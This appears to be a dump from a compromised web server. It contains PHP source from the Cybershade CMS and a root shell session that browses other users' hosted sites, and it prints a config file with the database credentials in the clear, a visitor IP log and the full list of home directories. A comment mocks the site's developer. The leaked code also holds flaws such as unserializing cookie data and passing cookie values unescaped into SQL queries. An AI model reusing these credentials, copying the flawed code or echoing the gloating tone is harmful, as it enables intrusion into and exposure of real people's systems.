if($config!==NULL || !empty($config)){
    $config_db = $_cache->generate_cache("config_db", "cache_config.php",
"SELECT * FROM ".$config['db']['prefix']."config");
    foreach($config_db as $array){
	$config[$array['array']][$array['var']] = $array['value'];
    }
    unset($array,$config_db);
}

//start the template class
$_template = new template('.', $_cache_, $_cache_path."files/");
$_template->cms_root = $cms_root;
$_template->user = $_user;

$_login->template = $_template;

//start the language class
$_language = $config['site']['language'];
if(isset($_SESSION['user']['language'])){
   
if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
){
	$_language = $_SESSION['user']['language'];
    }
}
require($cms_root."language/".$_language."/main.php");
$_time->cur_lang = $_language;

//run the lang pass function on the language vars AFTER we included the base
functions.
foreach($_lang as $key => $value){
	if(!is_array($_lang[$key])){
		$_lang[$key] = lang_pass($_lang[$key]);
	}
}

$_time->lang = $_lang;
$_bbcode->lang = $_lang;
$_login->lang = $_lang;
//Include the security files.. recaptchalib maybe add into the login class
require($cms_root."core/security.php");

require($cms_root."core/classes/class.captcha.php");
$_captcha = new Captcha($config['site']['captcha_pub'],
$config['site']['captcha_priv']);

$_cms_root = $cms_root;
//Include the mailer
require($cms_root."core/mailer.php");
$cms_root = $_cms_root;

/////////////////////////////////////////////////////////////////////////////
//--Continue with the configuration----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
define('ADMIN',     9);
define('DEV',	    8);
define('GMOD',	    7);
define('MOD',	    5);
define('USER',	    1);
define('BANNED',    0);

//add some stuff to the config

//generate guest defaults
$guest['user']['id'] = '0';
$guest['user']['username'] = 'Guest';
$guest['user']['theme'] = $config['site']['theme'];
$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
$_SESSION['user']['userkey'] : NULL;

//generate user stuff
$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
: $guest['user']);
$config['global']['ip'] = getIP();
$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
$_SERVER['HTTP_USER_AGENT'] : NULL);
$config['site']['guests_online'] = (isset($guests_online) &&
is_numeric($guests_online) ? $guests_online : 0);
$config['site']['users_online'] = (isset($_users_online) &&
is_numeric($_users_online) ? $_users_online : 0);
$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
: false;

#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}

$tpl = $config['site']['theme'];
if($config['site']['template_override']){
    if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
}else{
	if(isset($config['global']['user']['template']) &&
is_dir($cms_root."template/".$config['global']['user']['template']."/")){
		$tpl = $config['global']['user']['template'];
	}
}
$_template->config = $config;
$_template->tpl = $tpl;

//None of these should be defined as vars as they can be over writtin.. They
are defines
$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] :
$config['site']['default_module']);
$_user_temp = $cms_root."template/".$tpl."/";
$_module_temp = $cms_root."modules/".$_module."/template/";

if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
	unset($_SESSION['login']);
}

$_template->set_rootdir($cms_root);

define('IS_MOD',    $_user->check_permissions($config['global']['user']['id'],
MOD));
define('IS_GMOD',   $_user->check_permissions($config['global']['user']['id'],
GMOD));
define('IS_DEV',    $_user->check_permissions($config['global']['user']['id'],
DEV));
define('IS_ADMIN',  $_user->check_permissions($config['global']['user']['id'],
ADMIN));

/////////////////////////////////////////////////////////////////////////////
//--Grab the neccesarry cache files----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//this defines which of the cache files to include
//require($cms_root.'core/cacher.php');

   
/////////////////////////////////////////////////////////////////////////////
   
//--Cacher.php-------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////
$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans',
'user_permissions', NULL);#'badwords', 'affiliates',
$x=0;
include($cms_root."cache/cache.php");
while($var = $cache_gen[$x]){
    if($var != ''){
	$gen = NULL;
	    eval('$gen = $'.$var.'_db;');

	    /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
		include($cms_root."cache/cache_".$var.".php");
		eval('$gen = $'.$var.'_db;');
		}*/
		if ($gen !== NULL || !empty($gen)){
			foreach($gen as $k => $v){
		    $config[$var][$k] = $v;
		}
		}else{
		//regenerate the cache if not avalible
		    switch($var){
		    case 'config':
			$config[$var] = $_cache->generate_cache("config_db",
"cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
		    break;
		    case 'minimenu':
			$config[$var] = $_cache->generate_cache("minimenu_db",
"cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY
disporder ASC");
		    break;

		    case 'menu':
			$config[$var] = $_cache->generate_cache("menu_db",
"cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id
ASC", NNUM);
:
		    break;

		    case 'statistics':
			$config[$var] = $_cache->generate_statistics_cache();
		    break;

		    case 'groups':
			$config[$var] = $_cache->generate_cache("groups_db",
"cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY
rank DESC");
		    break;
		    case 'bans':
			$config[$var] = $_cache->generate_cache("bans_db",
"cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
		    break;
		    //case 'affiliates':
		    //	  $config[$var] =
$_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM
".$config['db']['prefix']."affiliates");
		    //break;
		    //case 'module_permissions':
		    //	  $config[$var] =
$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");
		    //break;
		    case 'user_permissions':
			$config[$var] = $_cache->generate_upermissions_cache();

		    break;
		}

	}
	}
	$x++;
}
   
/////////////////////////////////////////////////////////////////////////////
   
//--Cacher.php-------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////


$_user->groups = $config['groups'];
//$_user->module_permissions = $config['module_permissions'];
$_user->permissions = $config['user_permissions'];

/////////////////////////////////////////////////////////////////////////////
//--Cron - This will sort the majority of the cache and--------------------//
//---------db problems out for us------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/cron.php');

   
/////////////////////////////////////////////////////////////////////////////
   
//--Cron.php---------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////

if(!defined('NO_DB')){
    $hourly_cron = FALSE;
    if(isset($config['site']['hourly_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'hourly_cron'");
		$hourly_cron = TRUE;
	} else {
		if($config['site']['hourly_time'] == 0){
			$hourly_cron = TRUE;
		}else{
			if((time() - $config['site']['hourly_time']) > 
$config['statistics']['hourly_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'hourly_cron'");
				$hourly_cron = TRUE;
			}
:
		}
	}
    }

    $daily_cron = FALSE;
    if(isset($config['site']['daily_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'daily_cron'");
		$daily_cron = TRUE;
	} else {
		if($config['site']['daily_time'] == 0){
			$daily_cron = TRUE;
		}else{
			if((time() - $config['site']['daily_time']) > 
$config['statistics']['daily_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'daily_cron'");
				$daily_cron = TRUE;
			}
		}
	}
    }

    $weekly_cron = FALSE;
    if(isset($config['site']['weekly_time'])){
	if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
		$_sql->updateRow("statistics", array('value' => time()),
"variable = 'weekly_cron'");
		$weekly_cron = TRUE;
	} else {
		if($config['site']['weekly_time'] == 0){
			$weekly_cron = TRUE;
		}else{
			if((time() - $config['site']['weekly_time']) > 
$config['statistics']['weekly_cron']){
				$_sql->updateRow("statistics", array('value' =>
time()), "variable = 'weekly_cron'");
				$weekly_cron = TRUE;
			}
		}
	}
    }
}

$stat_cache = false;
if(!defined('NO_DB')){
	if($hourly_cron){
	    $_sql->record_message('Hourly CRON is running');
		//delete users from sql that are inactive and set users offline
that are inactive too
		$_sql->query("UPDATE shr_users
	    SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE
cs_online.uid = shr_users.id)
	    WHERE EXISTS
	      ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid =
shr_users.id)");
		$_sql->deleteRow('online', "login_time <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp <
".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
		$_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE
"66.249%"');
		$_cache->generate_statistics_cache();
		$stat_cache = true;

	}

	if($daily_cron){
	    $_sql->record_message('Daily CRON is running');
		//update caches
		if(!$stat_cache){
		$_cache->generate_statistics_cache();
		$stat_cache = true;
:
	}

	if($config['forum']['auto_lock']){
	    //Auto Lock Thread Timer
	    $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'],
'', 1);
	    $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster
<= $ex", 1);
	}

	$_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE
expire < ".time()."");

		$_cache->generate_upermissions_cache();
	$_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT *
FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
		$_cache->generate_cache("menu_db", "cache_menu.php", "SELECT *
FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
	    //$_cache->generate_cache("module_permissions_db",
"cache_module_permissions.php", "SELECT * FROM
".$config['db']['prefix']."module_permissions");

	}

	if($weekly_cron){
	    $_sql->record_message('Weekly CRON is running');
		if(!$stat_cache){
		$_cache->generate_statistics_cache();
		$stat_cache = true;
	}

	$_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM
".$config['db']['prefix']."config");
	    $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT *
FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");

	//Optimise all of the tables in the DB
		$alltables = $_sql->getTable("SHOW TABLES");
	    $tables = '';
	    $counter = count($alltables);
	    $x = 0;
	    $add = ", ";
	    foreach($alltables as $table){
		foreach ($table as $tablename){
			if($x == ($counter-1)){
				$add = '';
			}
			$tables .= "`$tablename`$add";
			$x++;
		}
	    }
	    $_sql->query("OPTIMIZE TABLE $tables");
	    $_sql->updateRow("statistics", array('value' => time()), "variable
= 'weekly_time'", FALSE);
	}

	if($weekly_cron || $daily_cron || $hourly_cron){
	define('FILE_MERGE', 1);
	include($cms_root.'merge.php');
	}
}
   
/////////////////////////////////////////////////////////////////////////////
   
//--Cron.php---------------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////
//--Check weather the site is closed---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
	if (!$_user->check_permissions($config['global']['user']['id'],
ADMIN)){
		die(die_error(4));
:
	}
}

/////////////////////////////////////////////////////////////////////////////
//--Check weather a user is banned-----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/**
if ($config['bans'] != NULL){
	foreach ($config['bans'] as $bans){
		if ($bans['user_ip'] == $config['global']['ip']){
			die(die_error($bans['die']));
		}
	}
}
**/

/////////////////////////////////////////////////////////////////////////////
//--Sort out the guests & users online stuff-------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/usertracker.php');

   
/////////////////////////////////////////////////////////////////////////////
   
//--UserTracker.php--------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////
if(!defined('NO_DB') && !defined('NO_LOG')){

if(!isset($_SESSION['user']['userkey'])){
    //cookie check
    if(!$_user->is_online){
		if(isset($_COOKIE[$config['db']['ckefix'].'login']) &&
!empty($_COOKIE[$config['db']['ckefix'].'login'])){
	    $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
	    if(isset($cookie[1]) && (int)isset($cookie[0])){
			if($cookie[1] ==
$_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
			    if($config['login']['autologinIpRestriction']) $aq
= " AND user_ip = '".getIP()."'";
			$query = $_sql->getTable("SELECT uid FROM
".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent
= '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
				if (count($query) == 1){
				    $user = $_sql->getTable("SELECT timestamp
FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
				    if($user!==NULL){
					$user = $user[0];
					       
$_sess->set_sessions($cookie[0]);

						$_SESSION['user']['last_visit']
= $user['timestamp'];
			    $_user->new_user($cookie[0], 'alogin');

			       
if($_user->get_new_threads($_SESSION['user']['last_visit']))
				setNotification('We have just updated your
forum icons to reflect new posts.', 'Forum Icons Updated', false,
$_SESSION['user']['id']);
			    $config['global']['user']['id'] =
$_SESSION['user']['id'];
					}
				}else{//if count query == 1
				setcookie($config['db']['ckefix']."login",
null, time() - 31536000);    //set cookie to remember me
			       
unset($_COOKIE[$config['db']['ckefix']."login"]);
		    }
			}else{ //if cookie == http user agent
				setcookie($config['db']['ckefix']."login",
null, time() - 31536000);    //set cookie to remember me
			       
unset($_COOKIE[$config['db']['ckefix']."login"]);
		}
		}else{//if cookie info == valid
			setcookie($config['db']['ckefix']."login", null, time()
- 31536000);	//set cookie to remember me
			unset($_COOKIE[$config['db']['ckefix']."login"]);
	    }
		redirect($_SERVER["PHP_SELF"]);

	}
    }
	$_user->new_user($config['global']['user']['id']);
}else{
    $return = $_user->update_location();
    if($return == 0){
	$_user->new_user($config['global']['user']['id']);
    }
}

}
   
/////////////////////////////////////////////////////////////////////////////
   
//--UserTracker.php--------------------------------------------------------//
   
/////////////////////////////////////////////////////////////////////////////

/**
 * Thanks to Jesus for this baby, this will add the level of sanitation
required for the diffrent data types
 */
function secureit($string, $type=''){
	switch($type){
		case 'post':
			$string = mysql_real_escape_string($string);
		break;
		default:
			$string = mysql_real_escape_string($string);
			$string = htmlentities($string);
			$string = stripslashes($string);
			$string = strip_tags($string);
		break;
	}
	return $string;
}
if (isset($_GET['code']) &&
$_user->check_permissions($config['global']['user']['id'], DEV)) {
    $explode = explode('/', $_SERVER['PHP_SELF']);
    die(highlight_file($explode[count($explode)-1], 1));
}
?>root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# less Gre.php
<?php
/*======================================================================*\
 |		Cybershade CMS - Your CMS, Your Way.			|
\*======================================================================*/
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}

error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
//this is to start the generation timer off
$gen_time = microtime();

//Include the session stuff
if(!SMODE) require($cms_root."core/classes/class.session.php");
if(SMODE) require($cms_root."core/classes/classes.php");
$_sess = new session;

//Set the headers
header("Cache-control: private");
header("Content-Type: text/html; charset=utf-8");
//ob_start("ob_gzhandler");

/////////////////////////////////////////////////////////////////////////////
//--Include the core CMS files needed -------------------------------------//
core.php
/////////////////////////////////////////////////////////////////////////////
:
://The config files
:require($cms_root."core/config.php");
:
:/*this is the ultimate cache-er xD, k so basically u got
: *    the var below which "allows" the static cacher through
: */
:
:#$allow = true;
:
://this little switch decided what should be auto cache'd
:/*switch(CMS_MENU){
:    case 'forum':   $allow = false;	 break;
:    case 'admin':   $allow = false;	 break;
:    case 'ucp':     $allow = false;	 break;
:    case 'login':   $allow = false;	 break;
:    case 'main':    $allow = false;	 break;
:    case 'pm':      $allow = false;	 break;
:    default:	     $allow = true;	 break;
:}
:
:if($allow){
:    // Get the modification date of this PHP file
:    $timestamps = array(@getlastmod());
:
:    // The latest of these modification dates is our real Last-Modified date
:    $timestamp = max($timestamps);
:
:    // Note that this is not a RFC 822 date (the tz is always GMT)
:    $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";
:
:    // Check if the client has the same page cached
:    if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
:	 ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
:	 header("HTTP/1.1 304 Not Modified");
:	 exit();
:    }
:    // Inform the user what is our last modification date
:    else {
:	 header("Last-Modified: " . $tsstring);
:    }
:}*/
:
://The class files
:require($cms_root."core/classes/class.sql.php");
:if(!SMODE)require($cms_root."core/classes/class.login.php");
:if(!SMODE)require($cms_root."core/classes/class.user.php");
:if(!SMODE)require($cms_root."core/classes/class.form.php");
:if(!SMODE)require($cms_root."core/classes/class.time.php");
:require($cms_root."core/classes/class.nbbc.php");
:require($cms_root."core/classes/class.tpl.php");
:if(!SMODE)require($cms_root."core/classes/class.cache.php");
:require($cms_root."core/classes/class.geshi.php");
:
://The base functions
:require($cms_root."core/base_functions.php");
:
://///////////////////////////////////////////////////////////////////////////
://--Sort out the cached config stuff---------------------------------------//
://///////////////////////////////////////////////////////////////////////////
:$config_db = array();
://check see if the config file exists, if not then just create a blank config
va
:riable
:if(file_exists($cms_root."cache/cache_config.php")){ include
$cms_root."cache/ca
:che_config.php"; }
:
://If the config_db is not null, cached.. then use it.
:if($config_db !== NULL){
:    foreach($config_db as $array){
:	 $config[$array['array']][$array['var']] = $array['value'];
:    }
:    unset($array);
:}
:
:if(isset($_GET['_site'])){
:    $a=(isset($_GET['_site']) ? $_GET['_site'] :
(isset($_SESSION['site']['mode'
:]) ? $_SESSION['site']['mode'] : $config['db']['prefix']));
:    switch($a){
:	 case 'dmz':
:	     $_SESSION['site']['mode'] = 'dmz_';
:	 break;
:	 case 'cs':
:	     $_SESSION['site']['mode'] = 'cs_';
:	 break;
:	 default:
:    }
:}
:if(isset($_SESSION['site']['mode']))
:    $config['db']['prefix'] = $_SESSION['site']['mode'];
:
://///////////////////////////////////////////////////////////////////////////
://--Define new instances of required classes-------------------------------//
://///////////////////////////////////////////////////////////////////////////
://start the sql
:$_sql = new sql(true);
:$_sql->config = $config;
:if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
:if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }
:
:
://Open the session stuff
:$_sess->sql = $_sql;
:$_sess->config = $config;
:
://start the form class
:$_form = new form;
:
://start the user class
:$_user = new user;
:$_user->config = $config;
:$_user->sql = $_sql;
root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/

# RoMeO's butt buddy xlink aka mad php c0d3r
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
ls -al 
drwxr-xr-x  2 romeo romeo 4096 Dec 23 14:31 .htpasswd
drwxr-xr-x  2 root  root  4096 May 23 00:10 logs
drwx--x--x  3 romeo romeo 4096 Dec 23 14:31 public_ftp
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
drwxr-xr-x  2 root  root  4096 May  1 00:10 stats
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]#
cd public_html/
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# ls -al
total 1188
drwxr-xr-x 13 romeo romeo   4096 May 19 22:42 .
drwx--x--x  7 romeo romeo   4096 Feb 10 19:26 ..
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 400.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 401.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 403.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 404.shtml
-rwxr-xr-x  1 romeo romeo    515 Feb 10 19:31 500.shtml
-rw-r--r--  1 romeo romeo   5254 Feb 16 08:01 acp.php
-rw-r--r--  1 romeo romeo   9757 Feb 16 08:01 ajax.php
-rw-r--r--  1 romeo romeo   2118 Feb 16 08:01 articles.php
drwxrwxrwx  5 romeo romeo   4096 Feb 10 19:31 cache
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 cgi-bin
-rw-r--r--  1 romeo romeo   5561 Feb 16 08:01 challenges.php
-rw-r--r--  1 romeo romeo 466963 Mar  1 14:51 cms_docs.zip
-rw-r--r--  1 romeo romeo   2137 Feb 10 19:31 codebase.php
-rw-r--r--  1 romeo romeo  17251 Feb 10 19:31 convertor.php
drwxr-xr-x  6 romeo romeo   4096 Feb 10 19:31 core
-rw-r--r--  1 romeo romeo      0 Feb 10 19:31 debug
-rw-r--r--  1 romeo romeo   3266 Feb 10 19:31 eg.gif
-rw-r--r--  1 romeo romeo  28213 Mar 20 12:59 farm.php
-rw-r--r--  1 romeo romeo   5020 Feb 16 08:01 forgotpass.php
-rw-r--r--  1 romeo romeo   7097 Feb 19 14:12 forum.php
-rw-r--r--  1 romeo romeo   2110 Feb 16 08:01 get_shouts.php
-rw-r--r--  1 romeo romeo   4546 Feb 19 14:12 .htaccess
-rw-r--r--  1 romeo romeo     36 Feb 10 19:31 .htpasswd
drwxr-xr-x  4 romeo romeo   4096 Feb 10 19:31 images
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 img
-rw-r--r--  1 romeo romeo   3998 Feb 16 08:01 index.php
-rw-r--r--  1 romeo romeo    843 Feb 16 08:01 irc.php
drwxr-xr-x  3 romeo romeo   4096 Feb 10 19:31 language
-rw-r--r--  1 romeo romeo   4103 Feb 19 14:12 latest_posts.php
-rwxr-xr-x  1 romeo romeo   7184 Feb 16 08:01 loader.php
-rw-r--r--  1 romeo romeo   8398 Feb 16 08:01 login.php
-rwxr-xr-x  1 romeo romeo  13954 Feb 10 19:31 logo.jpg
-rw-r--r--  1 romeo romeo   3006 Feb 16 08:01 merge.php
drwxr-xr-x 20 romeo romeo   4096 Feb 17 09:01 modules
-rw-r--r--  1 romeo romeo  10964 Feb 16 08:01 pastebin.php
-rw-r--r--  1 romeo romeo  35466 Feb 19 14:39 post.php
-rw-r--r--  1 romeo romeo   2142 Feb 16 08:01 privatemessages.php
-rw-r--r--  1 romeo romeo   9755 Feb 21 09:08 register.php
-rw-r--r--  1 romeo romeo   7986 Feb 16 08:01 rss.php
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 scripts
-rw-r--r--  1 romeo romeo   1065 Feb 16 08:01 search.php
-rw-r--r--  1 romeo romeo   1838 Feb 16 08:01 settings.php
drwxr-xr-x  8 romeo romeo   4096 Mar 19 10:13 skin
-rw-r--r--  1 romeo romeo 196608 Mar 19 10:20 skin.tgz
-rw-r--r--  1 romeo romeo    636 Feb 16 08:01 staff.php
-rw-r--r--  1 romeo romeo 133049 May 23 04:00 stress_test.txt
-rw-r--r--  1 romeo romeo    994 Feb 10 19:31 swiigle_upload.php
drwxr-xr-x  5 romeo romeo   4096 Feb 16 19:13 template
-rw-r--r--  1 romeo romeo    454 Feb 10 19:31 template.php
-rw-r--r--  1 romeo romeo    590 Feb 10 19:31 test.php
drwxr-xr-x  2 romeo romeo   4096 Feb 10 19:31 txt docs
-rw-r--r--  1 romeo romeo   2708 Feb 16 08:01 ucp.php
-rw-r--r--  1 romeo romeo   8546 Feb 19 14:12 view_group.php
-rw-r--r--  1 romeo romeo    876 Feb 16 08:01 view_profile.php
-rw-r--r--  1 romeo romeo  12838 Feb 19 14:12 view_topic.php
-rw-r--r--  1 romeo romeo   9571 Feb 16 08:01 windowed_options.php
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# cd core
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 .
drwxr-xr-x 13 romeo romeo  4096 May 19 22:42 ..
-rw-r--r--  1 romeo romeo   731 Feb 10 19:31 admin.js
-rw-r--r--  1 romeo romeo 27175 Feb 16 19:00 base_functions.php
-rw-r--r--  1 romeo romeo  9266 Feb 16 19:00 bbcode_tags.php
-rw-r--r--  1 romeo romeo  2816 Feb 10 19:31 cacher.php
drwxr-xr-x  4 romeo romeo  4096 Feb 10 19:31 classes
-rw-r--r--  1 romeo romeo  1376 Feb 16 19:00 cli.php
-rw-r--r--  1 romeo romeo  2847 Feb 10 19:33 config.php
-rw-r--r--  1 romeo romeo 23727 Feb 17 09:53 core.php
-rw-r--r--  1 romeo romeo  4518 Feb 10 19:31 cron.php
drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 err
-rw-r--r--  1 romeo romeo   236 Feb 16 19:00 force_user.php
drwxr-xr-x  2 romeo romeo  4096 Feb 10 19:31 functions
-rw-r--r--  1 romeo romeo  1181 Feb 16 19:00 key.php
-rw-r--r--  1 romeo romeo  6903 Feb 16 19:00 mailer.php
drwxr-xr-x  6 romeo romeo  4096 Feb 10 19:31 mint
-rw-r--r--  1 romeo romeo  3054 Feb 16 19:00 page_footer.php
-rw-r--r--  1 romeo romeo  6429 Feb 16 19:00 page_header.php
-rw-r--r--  1 romeo romeo  9762 Feb 16 19:00 recaptchalib.php
-rw-r--r--  1 romeo romeo  6601 Apr  5 12:58 security.php
-rw-r--r--  1 romeo romeo  2760 Feb 16 19:00 usertracker.php
root@server2:/home/romeo/domains/cybershade.org/public_html/core[root@server2
core]# less config.php
<?php
//Cybershade.Org

//Database Stuff
$config['db']['host']					= 'localhost';
$config['db']['username']				= 'romeo_romeo';
$config['db']['password']				= 'swU55ath';
$config['db']['database']				= 'romeo_DMZ_CS';
$config['db']['prefix'] 				= 'cs_';
$config['db']['shrfix'] 				= 'shr_'; //the prefix
f
or the shared tables
$config['db']['ckefix'] 		= 'CMS_'; //the cookie prefix
$config['db']['ckeauth']		= '0.7.0'; //the cookie auth key //this

is also a good way to invalidate the autologins on cms update
$config['site']['working_dir']			= '';

//config vars for if we loose the DB
$config['cms']['name']			= 'DarkMindZ';
$config['cms']['version']		= '_DDoS';
$config['cms']['debug'] 		= "0";
$config['site']['title']		= 'CyberShade CMS';
$config['site']['theme']		= 'cs';
$config['site']['language']		= 'en';
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2
public_html]# less stress_test.txt
/codebase/perl-2.html - 74.6.17.162 - Queries: 26 - SQLTime: 68.93934 -
PAGETime
r: -0.83011 |
/register.php - 89.149.254.135 - Queries: 5 - SQLTime: 10.82445 - PAGETimer:
0.2
6816 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.93658 - PAGETimer:
0.1065
6 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 11.43613 - PAGETimer:
0.0528
6 |
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 30.80612 - PAGETimer:
0.0420
1 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 12.93695 - PAGETimer:
0.0522
9 |
/index.php - 89.149.254.135 - Queries: 8 - SQLTime: 14.52338 - PAGETimer:
0.0435
5 |
/login.php - 89.149.254.135 - Queries: 6 - SQLTime: 14.55832 - PAGETimer:
0.0514
6 |
/forum/post.php?mode=lock_thread&id=5559 - 74.6.17.162 - Queries: 10 - SQLTime:

30.93873 - PAGETimer: 0.2404 |
/forum/thread5853.html - 66.249.70.100 - Queries: 18 - SQLTime: 41.73033 -
PAGET
imer: 0.09753 |
/codebase/mailform-asp-num147.html - 65.55.211.89 - Queries: 9 - SQLTime:
13.306
77 - PAGETimer: 0.11182 |
/ - 216.80.92.36 - Queries: 8 - SQLTime: 21.05451 - PAGETimer: 0.05534 |
root@server2:~[root@server2 ~]# cd /home
root@server2:/home[root@server2 home]# ls -la
total 152
drwx--x--x 36 root	 root	    4096 May 23 02:33 .
drwx--x--x 25 root	 root	    4096 May 22 09:26 ..
drwx--x--x  8 aaa	 aaa	    4096 Jan 24 22:06 aaa
drwx--x--x  6 admin	 admin	    4096 Jan 12 14:29 admin
drwx--x--x  8 beyond	 beyond     4096 Jan 24 22:33 beyond
drwx--x--x  4 bloo	 bloo	    4096 May 23 02:04 bloo
drwx--x--x  7 bootroot	 bootroot   4096 May 12 21:27 bootroot
drwx------  2 clamav	 clamav     4096 Apr  1 22:35 clamav
drwx--x--x  6 dablitz	 dablitz    4096 May 21 23:50 dablitz
drwx--x--x  6 dakilla	 dakilla    4096 May 20 23:41 dakilla
drwxr-xr-x  2 root	 root	    4096 Dec  3  2007 ftp
drwx--x--x  8 furiogamin furiogamin 4096 May 21 02:55 furiogamin
drwx--x--x  7 h3mod	 h3mod	    4096 Feb 26 17:31 h3mod
drwx--x--x  5 haiobr	 haiobr     4096 May 19 06:43 haiobr
drwx--x--x  4 hbxmike	 hbxmike    4096 May 11 17:19 hbxmike
drwx--x--x  8 hotglow	 hotglow    4096 Jan 24 22:35 hotglow
drwx--x--x  8 hrdev	 hrdev	    4096 May 13 18:43 hrdev
drwx--x--x  7 hstrike	 hstrike    4096 Feb 17 15:56 hstrike
drwx--x--x  6 kaza	 kaza	    4096 Apr 27 20:47 kaza
drwx--x--x  6 keytraderz keytraderz 4096 Apr 15 15:37 keytraderz
drwx--x--x  6 mrgod	 mrgod	    4096 May 15 14:32 mrgod
drwx--x--x  5 odin	 odin	    4096 May  8 05:01 odin
drwx--x--x  5 pagewiz	 pagewiz    4096 May 18 18:49 pagewiz
drwx--x--x  6 penguin	 penguin    4096 Mar  8 18:49 penguin
drwx--x--x  6 pimpinjg	 pimpinjg   4096 Mar 26 16:13 pimpinjg
drwx--x--x  5 ristop	 ristop     4096 May 22 15:33 ristop
drwx--x--x  6 romeo	 romeo	    4096 Apr 22 15:51 romeo
drwx--x--x  4 sam	 sam	    4096 May 12 09:26 sam
drwx--x--x  7 scraft758  scraft758  4096 Apr 16 20:03 scraft758
drwx------  2	     546	547 4096 May 23 02:33 test
drwxrwxrwt  2 root	 root	    4096 May 23 03:36 tmp
drwx--x--x  6 wheelglow  wheelglow  4096 Jan 24 22:49 wheelglow
